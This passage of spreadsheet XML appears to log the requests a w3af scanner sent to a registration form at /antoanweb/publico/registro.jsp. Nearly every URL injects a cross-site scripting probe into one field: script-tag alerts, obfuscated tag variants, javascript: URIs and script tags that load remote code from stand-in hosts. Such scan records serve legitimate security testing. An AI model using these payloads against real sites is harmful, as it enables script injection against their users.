    <t>/antoanweb/publico/registro.jsp?cp=xcowq&lt;hqpa&gt;hqpa"hqpa'hqpa(hqpa)xcowq&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=&lt;script&gt;a=/zqu8/alert(a.source)&lt;/script&gt;&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp='';!--"&lt;zqu8&gt;=&amp;{()}&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=javascript:alert("zqu8");&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=&lt;script&gt;alert("zqu8")&lt;/script&gt;&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=&lt;scr_x0000_ipt&gt;alert("zqu8")&lt;/sc_x0000_ript&gt;&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=&lt;script&gt;fake_alert("xxyp")&lt;/script&gt;&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=&lt;script&gt;fake_alert(string.fromcharcode(xxyp))&lt;/script&gt;&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp='';!--"&lt;xxyp&gt;=&amp;{()}&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=&lt;script+src=http://xxyp/x.js&gt;&lt;/script&gt;&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=&lt;_x0000_script&gt;fake_alert("xxyp")&lt;/script&gt;&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=&lt;script&gt;a=/xxyp/fake_alert(a.source)&lt;/script&gt;&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=fckd7</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=&lt;script/src=http://0ryz/x.js&gt;&lt;/script&gt;&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=&lt;_x0000_script&gt;fake_alert("0ryz")&lt;/script&gt;&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=fqbfw&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=&lt;script&gt;fake_alert(string.fromcharcode(ekq0))&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo='';!--"&lt;ekq0&gt;=&amp;{()}</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=&lt;script&gt;a=/ekq0/fake_alert(a.source)&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=&lt;script/xss+src=http://ekq0/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=&lt;script+src=http://ekq0/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=&lt;script&gt;fake_alert("ekq0")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=eu0oe&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=oofba&lt;ipbi&gt;ipbi"ipbi'ipbi(ipbi)oofba&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=&lt;_x0000_script&gt;alert("colq")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&lt;iframe+src="javascript:alert('colq');"&gt;&lt;/iframe&gt;&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp='';!--"&lt;colq&gt;=&amp;{()}&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=&lt;script&gt;a=/colq/alert(a.source)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&lt;script&gt;alert("colq")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javascript:alert("colq");&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=&lt;script/src=http://colq/x.js&gt;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'';!--"&lt;lk5k&gt;=&amp;{()}&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=&lt;script/src=http://lk5k/x.js&gt;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&lt;script/xss+src=http://lk5k/x.js&gt;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&lt;_x0000_script&gt;fake_alert("lk5k")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&lt;script&gt;fake_alert(string.fromcharcode(lk5k))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&lt;script+src=http://lk5k/x.js&gt;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&lt;script&gt;fake_alert("lk5k")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cp=&lt;script&gt;a=/lk5k/fake_alert(a.source)&lt;/script&gt;&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=gbr5f&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=aqmta&lt;zrsb&gt;zrsb"zrsb'zrsb(zrsb)aqmta&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=&lt;script&gt;alert("cwbr"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&gt;a=/cwbr/alert(a.source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_x0000_ipt&gt;alert("cwbr")&lt;/sc_x0000_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/src=http://cwbr/x.js&gt;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javas&amp;#x09;cript:alert("cwbr")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/xss+src=http://cwbr/x.js&gt;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_x0000_script&gt;alert("cwbr"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iframe+src="javascript:alert('cwbr');"&gt;&lt;/iframe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+src=http://cwbr/x.js&gt;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'';!--"&lt;cwbr&gt;=&amp;{()}&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=javascript:alert("cwbr");&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=javas_x0000_cript:alert("cwbr");&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=javas	cript:alert("cwbr")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&gt;alert(string.fromcharcode(cwbr)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&gt;a=/gdmh/fake_alert(a.source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&gt;fake_alert(string.fromcharcode(gdmh)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'';!--"&lt;gdmh&gt;=&amp;{()}&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=&lt;_x0000_script&gt;fake_alert("gdmh"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+src=http://gdmh/x.js&gt;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/xss+src=http://gdmh/x.js&gt;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&gt;fake_alert("gdmh"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/src=http://gdmh/x.js&gt;&lt;/script&gt;&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=kusud&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=&lt;script/src=http://nbje/x.js&gt;&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=&lt;script/xss+src=http://nbje/x.js&gt;&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni='';!--"&lt;nbje&gt;=&amp;{()}&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=&lt;_x0000_script&gt;fake_alert("nbje")&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=&lt;script&gt;a=/nbje/fake_alert(a.source)&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=&lt;script+src=http://nbje/x.js&gt;&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=ri4jl&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=&lt;script&gt;a=/esrp/fake_alert(a.source)&lt;/script&gt;&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=&lt;script&gt;fake_alert(string.fromcharcode(esrp))&lt;/script&gt;&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=&lt;script+src=http://esrp/x.js&gt;&lt;/script&gt;&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion='';!--"&lt;esrp&gt;=&amp;{()}&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=&lt;script/src=http://esrp/x.js&gt;&lt;/script&gt;&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=&lt;script/xss+src=http://esrp/x.js&gt;&lt;/script&gt;&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=zkggx&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script&gt;a=/pytx/fake_alert(a.source)&lt;/script&gt;&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script&gt;fake_alert(string.fromcharcode(pytx))&lt;/script&gt;&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script&gt;fake_alert("pytx")&lt;/script&gt;&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script/src=http://pytx/x.js&gt;&lt;/script&gt;&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script+src=http://pytx/x.js&gt;&lt;/script&gt;&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=tdgjg&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=&lt;script&gt;a=/p37g/fake_alert(a.source)&lt;/script&gt;&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=&lt;script+src=http://p37g/x.js&gt;&lt;/script&gt;&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=&lt;script/xss+src=http://p37g/x.js&gt;&lt;/script&gt;&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=&lt;script/src=http://p37g/x.js&gt;&lt;/script&gt;&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=&lt;script&gt;fake_alert("p37g")&lt;/script&gt;&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad='';!--"&lt;p37g&gt;=&amp;{()}&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=&lt;script&gt;fake_alert(string.fromcharcode(p37g))&lt;/script&gt;&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=wddid</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=&lt;script&gt;a=/2mtn/fake_alert(a.source)&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=&lt;script&gt;fake_alert(string.fromcharcode(2mtn))&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=&lt;script/xss+src=http://2mtn/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=&lt;_x0000_script&gt;fake_alert("2mtn")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=&lt;script&gt;fake_alert("2mtn")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=&lt;script/src=http://2mtn/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=&lt;script+src=http://2mtn/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo='';!--"&lt;2mtn&gt;=&amp;{()}</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=d9tfy&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre='';!--"&lt;nuhm&gt;=&amp;{()}&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=&lt;script/xss+src=http://nuhm/x.js&gt;&lt;/script&gt;&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=&lt;_x0000_script&gt;fake_alert("nuhm")&lt;/script&gt;&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=ysiar&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc='';!--"&lt;nlnc&gt;=&amp;{()}&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=&lt;script+src=http://nlnc/x.js&gt;&lt;/script&gt;&amp;modo=registro</t>
  </si>
  <si>
